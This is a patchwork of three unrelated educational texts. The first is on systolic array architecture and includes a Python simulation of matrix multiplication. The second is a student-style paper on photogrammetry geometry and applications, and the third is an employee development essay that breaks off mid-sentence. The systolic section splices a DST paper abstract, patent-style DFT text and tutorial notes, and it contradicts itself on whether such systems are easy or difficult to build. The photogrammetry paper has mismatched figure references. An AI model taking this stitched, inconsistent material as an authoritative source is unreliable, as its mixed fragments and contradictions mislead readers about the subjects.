We need high-performance, special-purpose computer systems to meet specific applications, and the imbalance between I/O and computation is a notable problem. The concept of systolic architecture can map high-level computation into hardware structures. A systolic system is easy to implement because of its regularity, and easy to reconfigure. Systolic architecture can result in cost-effective, high-performance special-purpose systems for a wide range of problems.


An efficient approach to designing very large scale integration (VLSI) architectures, and a scheme for the implementation of the discrete sine transform (DST) based on an appropriate decomposition method that uses circular correlations, are presented. The proposed design uses an efficient restructuring of the computation of the DST into two circular correlations, having similar structures and only one half of the length of the original transform; these can be concurrently computed and mapped onto the same systolic array. Significant improvement in computational speed can be obtained at a reduced input-output (I/O) cost and low hardware complexity, retaining all the other benefits of VLSI implementations of discrete transforms that use circular correlation or cyclic convolution structures. These features are demonstrated by comparing the proposed design with some previously reported schemes.
A more computationally efficient and scalable systolic architecture is provided for computing the discrete Fourier transform. The systolic architecture also provides a method for reducing the array area by limiting the number of complex multipliers. In one embodiment, the design improvement is achieved by taking advantage of a more efficient computation scheme based on symmetries in the Fourier transform coefficient matrix and the radix-4 butterfly. The resulting design provides an array comprised of a plurality of smaller base-4 matrices that can simply be added or removed, giving scalability of the design for applications involving different transform lengths. In this embodiment, the systolic array size provides greater flexibility because it can be applied to any transform length that is an integer multiple of sixteen.
CHARACTERISTICS OF SYSTOLIC ARCHITECTURE:-

A massive and non-centralised parallelism
Local communications
Synchronous evaluation
Data coming from the memory are used several times before returning to it.
These architectures are well suited to a VLSI or FPGA network implementation.

· Other characteristics :

A systolic network is often used with a host station responsible for communication with the outside world.
As a result of the local-communication scheme, a systolic network is easily extended without adding any burden to the I/O.

PRINCIPLE OF SYSTOLIC ARCHITECTURE:-
A systolic system consists of a set of interconnected cells, each capable of performing some simple operation. The systolic approach can speed up a compute-bound computation in a relatively simple and inexpensive manner: through a systolic array we achieve higher computation throughput without increasing memory bandwidth.
This means that by using systolic architecture we can speed up our system. For example, where a simple architecture can perform at most five million operations per second, by using systolic arrays we can operate the system at a speed of 30 million operations per second.
WORKING:-
Systolic architecture consists of simple cells arranged in some regular pattern (linear, bi-directional, triangular, hexagonal, etc.) where each cell usually performs one operation. Each processing cell is connected to its neighbour, or to a neighbourhood of processing elements, by short signal paths. Both parallel and pipelined execution are implemented. A function that is to be performed can be represented by a set of functional primitives.
The systolic structure has advantages of regularity and modularity over implementations of the block-state-variable form: it is regular, and an nth-order filter is simply formed by cascading second-order filters. Therefore it is more suitable for VLSI implementation. The idea is to exploit VLSI efficiently by laying out algorithms (and hence architectures) in 2-D (not all systolic machines are 2-D, but most are). The architectures thus produced are not general but tied to specific algorithms, which is good for computation-intensive tasks (e.g. signal processing).
TOOLS FOR SYSTOLIC ARCHITECTURE:-
SYSTOLIC ARRAY:-
In computer architecture, a systolic array is a pipe network arrangement of processing units called cells. It is a specialized form of parallel computing, where cells (i.e. processors) compute data and store it independently of each other.
A systolic system works like an automobile assembly line: simple, regular cells each perform part of the computation as data streams through, mapping high-level computation directly into hardware structures.
Systolic Array Example:
3×3 Systolic Array Matrix Multiplication (the array completes the product in T = 7 steps):-
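The timing above can be checked with a small simulation. The sketch below is a minimal Python model of an output-stationary systolic array (the register names and skewed data feed are illustrative, not from the text): each cell multiply-accumulates the A-value arriving from the left and the B-value arriving from above, then forwards both; an n×n product finishes in 3n − 2 steps, i.e. T = 7 for the 3×3 case.

```python
import numpy as np

def systolic_matmul(A, B):
    """Simulate an n x n output-stationary systolic array computing C = A @ B.

    Rows of A enter from the left edge (row i delayed by i steps); columns
    of B enter from the top edge (column j delayed by j steps). Each step,
    every cell forwards its A-value right and its B-value down, and adds
    the product of the values passing through it to its stationary sum.
    """
    n = A.shape[0]
    C = np.zeros((n, n), dtype=A.dtype)
    a_reg = [[0] * n for _ in range(n)]   # A-values currently held in each cell
    b_reg = [[0] * n for _ in range(n)]   # B-values currently held in each cell
    for t in range(3 * n - 2):            # total latency: 3n - 2 steps
        # Shift A-values one cell to the right (far column first), then
        # inject the next skewed element (or a dummy 0) at the left edge.
        for i in range(n):
            for j in range(n - 1, 0, -1):
                a_reg[i][j] = a_reg[i][j - 1]
            k = t - i
            a_reg[i][0] = A[i, k] if 0 <= k < n else 0
        # Shift B-values one cell down, inject at the top edge.
        for j in range(n):
            for i in range(n - 1, 0, -1):
                b_reg[i][j] = b_reg[i - 1][j]
            k = t - j
            b_reg[0][j] = B[k, j] if 0 <= k < n else 0
        # Every cell performs one multiply-accumulate per step.
        for i in range(n):
            for j in range(n):
                C[i, j] += a_reg[i][j] * b_reg[i][j]
    return C
```

At step t, cell (i, j) holds A[i, t−i−j] and B[t−i−j, j], so it accumulates exactly the terms of the (i, j) inner product; for n = 3 the loop runs exactly 7 steps.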
DESCRIPTION OF SYSTOLIC ARRAYS:-
· Description :

It is a network of interconnected processing units.
Only the processors at the border of the architecture can communicate outside.

A systolic array is composed of matrix-like rows of data processing units called cells. Data processing units (DPUs) are similar to central processing units (CPUs), except for a program counter, since operation is transport-triggered, i.e., by the arrival of a data object. Each cell shares information with its neighbors immediately after processing. The systolic array is often rectangular, with data flowing across the array between neighbour DPUs, often with different data flowing in different directions. The data streams entering and leaving the ports of the array are generated by auto-sequencing memory units (ASMs). Each ASM includes a data counter. In embedded systems a data stream may also be input from and/or output to an external source.
An example of a systolic algorithm might be designed for matrix multiplication. One matrix is fed in a row at a time from the top of the array and is passed down the array; the other matrix is fed in a column at a time from the left-hand side of the array and passes from left to right. Dummy values are then passed in until each processor has seen one whole row and one whole column. At this point, the result of the multiplication is stored in the array and can now be output a row or a column at a time, flowing down or across the array.
Systolic arrays are arrays of DPUs which are connected to a small number of nearest-neighbour DPUs in a mesh-like topology. DPUs perform a sequence of operations on data that flows between them. Because traditional systolic array synthesis methods have been practiced by algebraic algorithms, only uniform arrays with only linear pipes can be obtained, so that the architectures are the same in all DPUs. The consequence is that only applications with regular data dependencies can be implemented on classical systolic arrays. Like SIMD machines, clocked systolic arrays compute in "lock-step", with each processor undertaking alternate compute and communicate phases. Systolic arrays with asynchronous handshake between DPUs are called wavefront arrays. One well-known systolic array is CMU's iWarp processor, which was manufactured by Intel. An iWarp system has a linear array processor connected by data buses going in both directions.
· Super Systolic Array :
The super systolic array is a generalization of the systolic array. Because the classical synthesis methods (algebraic, i.e. projection-based synthesis) yield only uniform DPU arrays permitting only linear pipes, systolic arrays could be used only to implement applications with regular data dependencies. By using simulated annealing instead, Rainer Kress introduced the generalized systolic array: the super systolic array. Its application is not restricted to applications with regular data dependencies.
Applications:-
An application Example – Polynomial Evaluation
Horner’s rule for evaluating a polynomial is:
y = (…(((a_n*x + a_{n−1})*x + a_{n−2})*x + a_{n−3})*x + … + a_1)*x + a_0

A linear systolic array in which the processors are arranged in pairs: one multiplies its input by x and passes the result to the right; the next adds a_j and passes the result to the right.
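The behaviour of that linear array can be sketched in a few lines of Python (the function name and coefficient ordering are illustrative): each loop iteration models one multiply-cell (times x) followed by one add-cell (plus the next coefficient), with the partial result streaming to the right.

```python
def horner_systolic(coeffs, x):
    """Evaluate a_n*x^n + ... + a_1*x + a_0 the way the linear array does.

    coeffs lists the coefficients highest degree first: [a_n, ..., a_1, a_0].
    Each iteration models one multiply cell (times x) and one add cell
    (plus the next coefficient) passing the result rightwards.
    """
    y = coeffs[0]              # a_n enters the leftmost cell
    for a in coeffs[1:]:
        y = y * x + a          # one multiply/add cell pair
    return y
```

For example, `horner_systolic([2, -3, 0, 5], 2)` evaluates 2x³ − 3x² + 5 at x = 2 and returns 9, using n multiplications and n additions instead of the naive power-by-power evaluation.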

Drawbacks of such special-purpose arrays:

Expensive
Highly specialized for particular applications
Difficult to build

Systolic architectures are designed by using linear mapping techniques on regular dependence graphs (DG).

Regular dependence graph: the presence of an edge in a certain direction at any node in the DG represents the presence of an edge in the same direction at all nodes in the DG.
The DG corresponds to a space representation; no time instance is assigned to any computation (t = 0). Systolic architectures have a space-time representation in which each node is mapped to a certain processing element (PE) and is scheduled at a particular time instance.
The systolic design methodology maps an N-dimensional DG to a lower-dimensional systolic architecture; typically, a mapping of the N-dimensional DG to an (N−1)-dimensional systolic array is considered.
CONCLUSION:

A massively parallel architecture with limited input/output communication with the host computer.
Suitable for many iterative operations.
Replaces a single processor with an array of regular processing elements.
Orchestrates data flow for high throughput with less memory access.
Different from pipelining: the array structure may be nonlinear, data flow may be multidirectional, and each PE may have a (small) local instruction and data memory.
Different from SIMD: each PE may do something different.
Initial motivation: VLSI enables inexpensive special-purpose chips.
Algorithms are represented directly by chips connected in a regular pattern.


## Principles and Applications of Laser Photogrammetry

Laser Photogrammetry

Abstract

This paper explains the working principles and applications of laser photogrammetry. Photogrammetry derives from Greek: "photos" meaning light, "gramma" meaning something drawn or written, and "metron" meaning measure; hence, measuring with photographs. Thus, photogrammetry can be defined as a 3-dimensional coordinate measuring technique that uses photographs as the fundamental medium for measurement. It is an estimation of the geometric and semantic properties of objects based on images or observations from similar sensors. Traditional cameras, laser scanning and smartphones can be taken as examples of such sensors. Measurements are made to give the location, recognition and interpretation of an image or scene. The technology has been used for decades to get information about an object from an image; for instance, autonomous cars need a better understanding of the objects in front of them. The working principle is aerial triangulation, in which photographs are taken from at least two different locations and lines of sight are developed from each camera to points on the object. This paper mainly addresses the applications of laser photogrammetry. These applications include: recent advances of photogrammetry in robot vision; remote sensing applications and how that technology is aligned with photogrammetry; and the application of photogrammetry in computer vision, including the relationship between photogrammetry and computer vision. The robotics application of photogrammetry is a young discipline in which maps of environments are built and interpretations of the scene are performed. This is usually carried out with small drones, which give accurate results, updated maps and terrain models. Another application of photogrammetry is remote sensing. As its name indicates, remote sensing is done remotely, without touching the object or scene. Remote sensors are used to cover large areas and where contact-free sensing is desired; for instance, some objects are not accessible, or are delicate or toxic to touch.
Thus, remote sensors can be placed as far away as satellites in orbit, and photogrammetry plays an important role in interpretation of the scenes or objects. The third application of photogrammetry is in computer vision. In computer vision, the applications of photogrammetry addressed in this paper include: image-based cartography, aerial reconnaissance and simulated environments.

Introduction

Photogrammetry means obtaining reliable information about physical objects and their environments by measuring and interpreting photographs. It is the science and art of determining qualitative and quantitative features of objects from the images recorded on photographic emulsions. Laser photogrammetry and 3D laser scanning are different technologies for different project purposes: in 3D laser scanning, one uses a laser to take each individual measurement, whereas in photogrammetry one uses a series of photographs with overlapping pixels to extract 3D information. Qualitative observations are identification of deciduous versus coniferous trees, delineation of geologic landforms, and inventories of existing land use, whereas quantitative observations are size, orientation, and position. Identification and description of objects are performed by observing the shape, tone and texture of the photographic image. Vertical photographs, exposed with the optical axis vertical or as nearly vertical as possible, are the principal kind of photographs used for mapping [2]; the geometry of a single vertical aerial photograph is illustrated in Figure 1. In a vertical aerial photograph, the exposure station of the photograph is the front nodal point of the camera lens. The nodal points are points in the camera lens system such that any light ray entering the lens and passing through the front nodal point will emerge from the rear nodal point travelling parallel to the incident light ray [2]. The object side of the camera lens has the positive photograph, placed such that the object point, the image point, and the exposure station all lie on the same straight line [2]. The line through the lens nodal points and perpendicular to the image plane intersects the image plane at the principal point [2].
The distance measured from the rear nodal point to the negative principal point or from the front nodal point to the positive principal point is equal to the focal length f of the camera lens [2].


The ratio between an image distance on the photograph and the corresponding horizontal ground distance is the scale of an aerial photograph [1]. For a correct photographic scale ratio, the image distance and the ground distance must be measured in parallel horizontal planes [1]. However, this condition rarely occurs, because most photographs are tilted and ground surfaces are not flat horizontal planes. As a result, scale differs throughout the format of a photograph; the photographic scale can be defined only at a point, and is given by equation 1 [1]. Equation 1 is used to calculate scale on vertical photographs and is exact for truly vertical photographs [1].

S = f / (H − h)
(1)

where:

S= photographic scale at a point

f = camera focal length

H= flying height above datum

h= elevation above datum of the point

Figure 1: Geometry of a vertical aerial photogrammetry [2]
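Equation 1 is easy to sanity-check numerically. The short sketch below computes the point scale; the focal length and heights are illustrative values, not taken from the paper.

```python
def photo_scale(f, H, h):
    """Equation 1: S = f / (H - h).

    f = camera focal length, H = flying height above datum,
    h = elevation of the point above datum; all in the same units.
    """
    return f / (H - h)

# Illustrative values: f = 152.4 mm = 0.1524 m, H = 1500 m, h = 300 m.
S = photo_scale(0.1524, 1500.0, 300.0)
print(f"scale = 1:{1 / S:.0f}")   # about 1:7874
```

Note that the higher the ground point (larger h), the larger the scale at that point, which is why a single photograph has no single scale.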

For calculations such as flight planning, approximate scales and distances are adequate for direct measurement of ground distances. The average scale is found by using equation 2 [1].

S_ave = f / (H − h_ave)
(2)

where h_ave is the average ground elevation in the photo. Referring to the vertical photograph shown in Figure 2 below, the approximate horizontal length of the line AB is given by equation 3 [1].

D ≅ d (H − h_ave) / f
(3)

where:

D= horizontal ground distance

d= photograph image distance

Figure 2: Horizontal ground coordinates from single vertical photograph [1]
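Equations 2 and 3 can be sketched the same way; again the sample numbers are illustrative only.

```python
def average_scale(f, H, h_ave):
    """Equation 2: S_ave = f / (H - h_ave)."""
    return f / (H - h_ave)

def ground_distance(d, f, H, h_ave):
    """Equation 3: D ~= d * (H - h_ave) / f.

    Converts a distance d measured on the photograph to an approximate
    horizontal ground distance using the average scale.
    """
    return d * (H - h_ave) / f

# Illustrative: a 50 mm line on the photo, f = 0.1524 m, H = 1500 m,
# average ground elevation 300 m -> roughly 394 m on the ground.
D = ground_distance(0.050, 0.1524, 1500.0, 300.0)
```

Dividing the photo distance by the average scale is the same operation, so `ground_distance(d, ...)` equals `d / average_scale(...)`.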

Again, to get an accurate measurement of the horizontal distances and angles, the scale variations caused by elevation differences between points must be considered [2].

Horizontal ground coordinates are calculated by dividing each photocoordinate by the true photographic scale at the image point [2]. In equation form, the horizontal ground coordinates of any point are given by equation 4.

X_p = x_p (H − h_p) / f
(4)

Y_p = y_p (H − h_p) / f

where:

X_p, Y_p = ground coordinates of point p

x_p, y_p = photocoordinates of point p

h_p = ground elevation of point p

Equation 4 uses a coordinate system defined by the photocoordinate axes, having an origin at the photo principal point and the x-axis typically through the midside fiducial in the direction of flight [2]. The local ground coordinate axes are then placed parallel to the photocoordinate axes with an origin at the ground principal point [2]. These equations are exact for truly vertical photographs and are typically used for near-vertical photographs. After the horizontal ground coordinates of points A and B in Figure 2 are computed, the horizontal distance is given by equation 5.

D_AB = [(X_A − X_B)^2 + (Y_A − Y_B)^2]^0.5
(5)

The elevations h_A and h_B must be known before the horizontal ground coordinates can be calculated [2]. If a stereo solution is used, there is no need to know the elevations h_A and h_B [2]. The solution given by equation 5 is not an approximation, because the effect of scale variation caused by unequal elevations is included in the computation of the ground coordinates [2].
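Equations 4 and 5 combine into a short sketch; the point names and sample photocoordinates below are illustrative, not from the paper.

```python
import math

def ground_coords(x_p, y_p, f, H, h_p):
    """Equation 4: X_p = x_p (H - h_p) / f,  Y_p = y_p (H - h_p) / f.

    Divides each photocoordinate by the true photographic scale
    f / (H - h_p) at the image point.
    """
    scale_inv = (H - h_p) / f
    return x_p * scale_inv, y_p * scale_inv

def horizontal_distance(P1, P2):
    """Equation 5: D = [(X1 - X2)^2 + (Y1 - Y2)^2]^0.5."""
    return math.hypot(P1[0] - P2[0], P1[1] - P2[1])

# Illustrative points A and B (photocoordinates in metres on the photo),
# at different ground elevations, so each gets its own point scale.
A = ground_coords(0.040, 0.030, 0.1524, 1500.0, 250.0)
B = ground_coords(-0.020, 0.010, 0.1524, 1500.0, 310.0)
D_AB = horizontal_distance(A, B)
```

Because each point is divided by its own scale before the distance is taken, the result is exact for a truly vertical photograph, as the text notes for equation 5.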

Another characteristic of the perspective geometry recorded by an aerial photograph is relief displacement. Relief displacement is evaluated when analyzing or planning mosaic or orthophoto projects [4]. Relief displacement can also be used in photo interpretation to obtain the heights of vertical objects [4]. This displacement is shown in Figure 3 and is calculated by equation 6 [2].

d = h_t r_top / (H − h_base)
(6)

where:

d = image displacement

r_top = radial distance from the principal point to the image of the top of the object

H = flying height above datum

Since the image displacement of a vertical object can be measured on the photograph, equation 6 can be solved for the height of the object, h_t, which is given by equation 7.

h_t = d (H − h_base) / r_top
(7)

where:

h_base = elevation of the object base above datum

Figure 4: Relief Displacement on a Vertical photograph [1]
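Equation 7 gives a quick way to estimate object heights from a single photograph; the sketch below uses illustrative values, not figures from the paper.

```python
def object_height(d, H, h_base, r_top):
    """Equation 7: h_t = d (H - h_base) / r_top.

    d      = relief displacement measured on the photo
    H      = flying height above datum
    h_base = elevation of the object base above datum
    r_top  = radial distance from the principal point to the image
             of the top of the object
    """
    return d * (H - h_base) / r_top

# Illustrative: 2 mm of displacement at r_top = 90 mm, flown 1000 m
# above the object's base -> a tower about 22 m tall.
h_t = object_height(0.002, 1200.0, 200.0, 0.090)
```

The displacement is radial from the principal point, so objects near the photo centre (small r_top) show little displacement and their heights are harder to measure this way.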

All photogrammetric procedures are built on two basic problems: resection and intersection, which may be solved by analog or analytical methods. Resection is the process of recovering the exterior orientation of a single photograph from image measurements of ground control points [4]. In a spatial resection, the image rays from full ground control points (horizontal position and elevation known) are made to resect through the lens nodal point (exposure station) to their image positions on the photograph [4]. The resection process restores the photograph's spatial position and angular orientation at the moment the exposure was taken. Intersection is the process of photogrammetrically determining the spatial position of ground points by intersecting image rays from two or more photographs [4]. If the interior and exterior orientation parameters of the photographs are known, then conjugate image rays can be projected from the photograph through the lens nodal point (exposure station) to the ground space. Two or more image rays intersecting at a common point will determine the horizontal position and elevation of the point. Map positions of points are determined by the intersection principle from correctly oriented photographs. The analog solution is one of the methods of solving these fundamental photogrammetric problems: it uses optical or mechanical instruments to form a scale model of the image rays recorded by the camera [2]. However, the physical constraints of the analog mechanism, the calibration, and unmodeled systematic errors limit the function and accuracy of the solution [4]. The analytical photogrammetry solution is the second method; it employs a mathematical model to represent the image rays recorded by the camera [2]. The collinearity condition equations include all interior and exterior orientation parameters required to solve the resection and intersection problems accurately [2]. Analytical solutions consist of systems of collinearity equations relating measured image photocoordinates to the known and unknown parameters of the photogrammetric problem [4].

Working Principles of Photogrammetry- Aerotriangulation

Aerial triangulation is defined as the process of determining the x, y and z ground coordinates of individual points based on measurements from the photographs [4]. The aerotriangulation geometry along a strip of photography is illustrated in Figure 6 [4]. Photogrammetric control extension requires that a group of photographs be oriented with respect to one another in a continuous strip or block configuration [4]. A pass point is an image point that is shared by three consecutive photographs (two consecutive stereomodels) along a strip. The exterior orientation of any photograph that does not contain ground control is determined entirely by the orientation of the adjacent photographs. Benefits of aerial triangulation include: minimizing delays and hardships due to adverse weather conditions; not requiring access to much of the property within the project area; and minimizing field surveying in difficult areas such as marshes, extreme slopes and hazardous rock formations. Aerial triangulation is classified into three categories:

Photogrammetric projection method (analogic or analytical) [4].

Strip or block formation and adjustment method (sequential or simultaneous) [4].

Basic unit of adjustment (strip, stereomodel, or image rays) [4].

Figure 6. Aerotriangulation geometry

Application of Photogrammetry

Robot vision

Robot vision systems are an important part of modern robots, as they enable the machine to interact with and understand the environment, and to take necessary measurements. The instantaneous feedback from the vision system, which is the main requirement of most robots, is achieved by applying very simple vision processing functions and/or through hardware implementation of algorithms [3]. One example of this application is close-range photogrammetry, which is used in time-constrained modes in robotics and target tracking [3].

Photogrammetry and Remote Sensing Applications

Remote sensing collects information about objects and features from imagery without touching them. It is mainly used to collect and derive 2D data, for instance slope, from all types of imagery. Photogrammetry is associated with the production of topographic mapping, generally from conventional aerial stereo photography [5]. Today photographs are taken with high-precision aerial cameras, and most maps are compiled by stereophotogrammetric methods. The advantage of aerial photogrammetry and topographic mapping is that it is cost-effective where ground survey methods cannot cover large areas. The map shows land contours, site conditions and details for large areas. Conventional aerial photography can produce accurate mapping at scales as large as 1:200. The accuracy is achieved by employing improved cameras and photogrammetric instrumentation.


After an area has been authorized for mapping, the planning and procurement of photography are the first steps in the mapping process. The necessary calculations are made on a flight design worksheet. The flight planner chooses the best available base map on which to delineate the designed flight lines. The final plan gives the location, length, and spacing of the flight strips.

Computer Vision

The goals of computer vision are object recognition, navigation, and object modeling. Today's object recognition algorithms function according to the data flow shown in Figure 7 below. Image features are extracted from the image intensity data, such as: regions of uniform intensity, boundaries along high image intensity gradients, curves of local intensity maxima or minima (line features), and other image intensity events defined by specific filters (corners) [4,6]. In order to obtain high-level measurements, these features are processed further. For instance, part of a step intensity boundary may be approximated by a straight-line segment, and the properties of the resulting line are used to define the boundary segment. Formation of a model for each class is the next step in recognition, in which the algorithms store the feature measurements for a particular object, or a set of object instances for a given class, and then use statistical classification methods to classify a set of features in a new image according to the stored feature measurements [4,6]. The second goal of computer vision is navigation. The goal of navigation is to provide guidance to an autonomous vehicle, which must maintain accurate following along a defined path. In the case of a road, it is desired to maintain a smooth path with the vehicle staying safely within the defined lanes. In the case of off-road travel, the vehicle must maintain a given route, and navigation is carried out with respect to landmarks [6]. The third goal of computer vision is object modeling. In object modeling, a complete and accurate 3D model of an object is recovered [6]. The model can then be used for different applications, such as supporting object recognition and image simulation. In image simulation, the image intensity data is projected onto the surface of the object to provide a realistic image of the object from any desired viewpoint [6].
Computer vision methods are also used for defect detection and assessment, as illustrated in Figure 8. The top of Figure 8 shows the general computer vision pipeline, from low-level processing up to high-level processing. Correspondingly, the bottom part of Figure 8 groups specific methods for the detection, classification, and assessment of defects on civil infrastructure into pre-processing methods, feature-based methods, model-based methods, pattern-based methods, and 3D reconstruction [6]. These methods, however, cannot be considered fully separate; rather, they build on top of each other. For example, extracted features are learned to support the classification process in pattern-based methods [6].

Figure 7: The operational structure of object recognition algorithms.

Figure 8: Categorizing general computer vision methods (top) and specific methods for defect detection, classification, and assessment of civil infrastructure (bottom).

Future Innovations and Developments

These days, close-range photogrammetry uses digital cameras whose capabilities yield moderate to very high accuracies in the measurement of objects. To improve robots’ vision capabilities, two alternatives are suggested and studied for the future: (a) hardware implementation of more complex image analysis functions with consideration of photogrammetric methodology, or (b) design of a robot on the “insect-level” intelligent system principle, based on the use of a great variety of different, simultaneous, but simple sensor functions [3]. In computer vision, the long-term goal with respect to aerial reconnaissance applications is change detection [6]. In this case, the changes from one observation to the next are meant to be significant changes, that is, significant from the human point of view [6]. Thus, in order to define only significant change, it is essential to be able to characterize human perceptual organization and representation.

Conclusion

When one is deciding whether to deploy one technology over the other for a given project, it is a question of how large an area must be collected and how accurately it needs to be collected. Photogrammetry can easily acquire large-scale data, has the ability to record dynamic scenes, records images that document the measuring process, and can process data automatically, possibly in real time. The disadvantages of photogrammetry are the necessity of a light source, flaws in measurement accuracy, and occlusions and visibility constraints. The performance of photogrammetry can be improved with computer simulation, which is more automatic and easier to deploy in places that are difficult to access. Photogrammetry’s contribution to heritage conservation cannot be overstated, and it is also particularly preferred for monitoring purposes, such as construction sites.

Works Cited

Hamilton Research Group. “Chapter 10: Principles of Photogrammetry.” In Physical Principles of Remote Sensing, 3rd ed. Cambridge University Press, New York, 2013. 441 pp.

Lillesand, Thomas M, et al. Remote Sensing and Image Interpretation. 6th ed., John Wiley & Sons, 2008.

Gruen, Armin. (1992). Recent advances of photogrammetry in robot vision. ISPRS Journal of Photogrammetry and Remote Sensing. 47. 307-323. 10.1016/0924-2716(92)90021-Z.

Linder, Wilfried. Digital Photogrammetry: A Practical Course. Springer Berlin Heidelberg, 2009. Accessed 2018.

CICES. “Photogrammetry and Remote Sensing.” Chartered Institution of Civil Engineering Surveyors, www.cices.org/.

A. Heller and J.L. Mundy. The evolution and testing of a model-based object recognition system. In Computer Vision and Applications, R. Kasturi and R. Jain, eds, IEEE Computer Society Press., 1991.

## Employee Development Plan: Importance and Applications

Employee Development Plan
Abstract
With the nation’s economic turmoil still lingering, it is more important than ever to develop plans that will encourage employees to remain with the company. Employee turnover is a crucial issue given the current economic standing of America. Each time an employee leaves, the company loses the money it spent training and developing that employee for a future with the company. The training, classes, and cross-training skills the company has invested in the employee then benefit the new company. Because this situation costs the company money, a new employee development plan has been designed in the hope of improving employee retention rates in the future.


Employee development allows employees to better equip themselves for their career choices. It is important to support their desire to develop more fully at work, while at the same time not investing money that walks out the door to the competition. This design allows the company to support and assist the employee’s desire to develop career skills and to feel that the company rewards the loyalty he or she has shown through years of service, while encouraging education as well as cross-training. The organizational consultant, per the research information and plan, challenges the organization to embrace the detailed plan to further develop each valuable employee. No matter what, organizational leaders must see the value in employee development and be willing to make the effort to show loyalty to their employees.
Employee Development Plan
With the nation’s economic turmoil still lingering, it is more important than ever to develop plans that will encourage employees to remain with the company. Each time an employee leaves, the company loses the money it spent training and developing that employee for a future with the company. The training, classes, and cross-training skills the company has invested in the employee then benefit the new company. Because this situation costs the company money, a new employee development plan has been designed in the hope of improving employee retention rates in the future.
Elbert Hubbard, the prominent American philosopher and writer, once said, “One machine can do the work of 50 ordinary men, but no machine can do the work of one extraordinary man” (Goldstein, 2003). His statement seems more pertinent than ever in the contemporary context of the shift from organizations focused on tangible assets like land or property to organizations relying on intangible assets such as creativity, knowledge, or problem solving. Statistics show that more than 50% of the Gross Domestic Product generated by developed economies is based on knowledge, with information technology (IT), education, and pharmaceuticals being the key sectors that account for this impressive percentage (www.yourpeoplemanager.com). This means that humans have become the major resource of modern companies. Consequently, their development and education are the major levers conditioning organizational growth. For that reason, leaders must understand the value of their employees and develop them for organizational and employee benefit. This research defines employee development and addresses why organizational leaders need it. The research demonstrates the link between employee development and company growth while sharing the benefits of employee training and development. Then the research outlines a plan that addresses hiring, training, development based on time, promotion, and education. Lastly, the conclusion calls leaders to action to realize the importance of, and build the plan for, developing their employees.
What is employee development and why do we need it?
Before starting to analyze the correlation between these two aspects, a clear picture of what employee training and development mean could prove extremely useful. First, a clear delimitation should be made among three concepts that people often confuse: education, training, and development. The first consists of preparing an individual’s mind in a framework that is separate from the organization. The second refers to attending courses aimed at improving the skills, knowledge, or attitudes needed to appropriately achieve a certain task within an organization, while the third is the natural result of the first two and is represented by the growth of the individual in terms of ability, understanding, and awareness (www.accel-team.com). This triangle proves indispensable to company performance, as it allows employees to take on more difficult tasks. In addition, it acclimates newcomers to the organization’s performance standards and helps them act within the same competitive pattern responsible for the company’s success. Further, it enhances the organization’s efficiency and effectiveness, responds to legislative requirements regarding health and safety, and sets an adequate framework for informing employees about changes that have been made and the courses they must attend in order to cope with those modifications.
Detecting the personnel needs that call for employee training and development programs is very difficult. However, managers can rely on various sources, such as common sense (for instance, the implementation of new technologies undoubtedly represents a solid reason for training) and the negative trends that statistics reveal (a decrease in output per employee, lower performance indices, behavioral problems like absences, sickness, lateness, etc.). Furthermore, government recommendations, predictions, specialists’ advice, alarms raised by specialized journals, and accounts from other organizations that have encountered a certain problem are other sources on which managers can rely.
Training and development may be achieved in both formal and informal ways. The former category implies attending courses held by internal or external trainers who usually combine impersonal lectures with interactive activities such as role-playing or simulation, forums, tests, and case studies presented with the help of video and computers. The latter category is a non-official one, and is mainly based on employees’ ability to draw their own conclusions after observing other workers, participating in meetings, rotating jobs within the organization or temporarily assisting employees from another company, teaching themselves by reading texts or viewing video tapes, being a member of a research team, and so on (www.accel-team.com).
Measuring the outcome of such training and development initiatives is very difficult because the results are qualitative rather than quantitative. Still, managers may observe whether the effectiveness and efficiency of their employees have increased by analyzing the number of customer complaints or the time in which a certain task is performed. They can also notice a faster acclimation of new employees, more effective use of machinery, higher job satisfaction reflected in higher-quality service to the client (and thus the attraction of new customers), fewer accidents, etc. Managers can also draw some conclusions concerning employees’ loyalty or the improvement of their qualifications, allowing them to contribute to tougher tasks or other positions within the organization (www.accel-team.com).
Research proving the link between employee development and company growth
Undoubtedly, employee development has a significant impact on customer satisfaction and on employees’ ability and willingness to resolve crises encountered by the organization or to adapt to changes in the business environment. Through training and development, a company’s personnel may gain the expertise necessary for approaching new markets or technologies, thus inducing cost savings in the end. Additionally, employees value training because it is seen as a strategic investment that the organization agrees to make because of the huge trust it has in its personnel’s potential. Therefore, employees will embrace a positive and enthusiastic attitude toward an organization concerned with their intellectual development and will work harder to help it achieve its mission and goals (Gross, 2000).
The link between employee satisfaction, customer satisfaction, and financial performance has also been outlined by AC Nielsen through its market research and by Sears through surveys carried out in its retail stores (Goldstein, 2003). Another research survey, carried out by Sirota, Mischkind, and Meltzer (2005) on a sample of 2.5 million employees, highlighted that companies boasting high morale tended to outperform competitors. Moreover, the research emphasized that among 28 companies with almost 920,000 employees, the share price of the 14 known as high-morale firms had an average increase of 16% in 2004, while the share price of the 6 known as low-morale firms had an average increase of only 3%. The results were significant when compared with the industry average of 6%, calculated for 9,240 companies (http://knowledge.wharton.upenn.edu). In conclusion, higher morale and enthusiasm lead to increased financial performance. As employee development and training are said to be rewards boosting personnel’s positivity and satisfaction, they may be considered inherently linked to company growth.
Benefits of employee training and development
A major benefit of employee development is increased productivity. Because of the courses he or she attends, an employee may learn advanced techniques that lead to higher efficiency and effectiveness in performing tasks. For instance, if a company’s bookkeeper is sent to an Excel course, he or she will be taught several shortcuts that will help complete job tasks faster. On one hand, this means that he or she can perform other activities that would otherwise have required hiring new employees and spending more money. On the other hand, increased efficiency results in prompt accountancy reports and ledgers that managers can consult in a timely fashion in order to make operational decisions. This means less time, and consequently, less money spent.
A second benefit of employee development is reduced turnover. Research carried out on this issue has emphasized that an employee’s trajectory within an organization has the form of a parabola. In the beginning, he is enthusiastic about his new job and learns everything he needs in order to live up to the company’s expectations and gain recognition for his well-done work. This ascending trend (or honeymoon, as Sirota calls it) lasts five or six months, until the individual reaches a climax where routine comes into the limelight. He continues to do his job for a certain period, but as nothing new appears, the employee decides to leave the company to try something different or look for another challenge. Yet Sirota’s (2005) research shows that 10% of the companies surveyed succeed in ensuring their employees a honeymoon prolonged throughout their entire career, because they understand the difficulty of “being enthusiastic about an organization that is not enthusiastic about you” (http://knowledge.wharton.upenn.edu). Consequently, they implement development programs that help employees seize opportunities and prepare for complex tasks that might reveal numerous latent skills or abilities. Additionally, employee development may be presented as a supplementary path to job security, which became a top need after the collapse of high-tech companies and September 11, 2001. A perfect example of a high-morale company in these terms is Southwest Airlines, which, after the terrorist attacks in September, stated: “We will take a hit in our stock price and not lay off anybody” 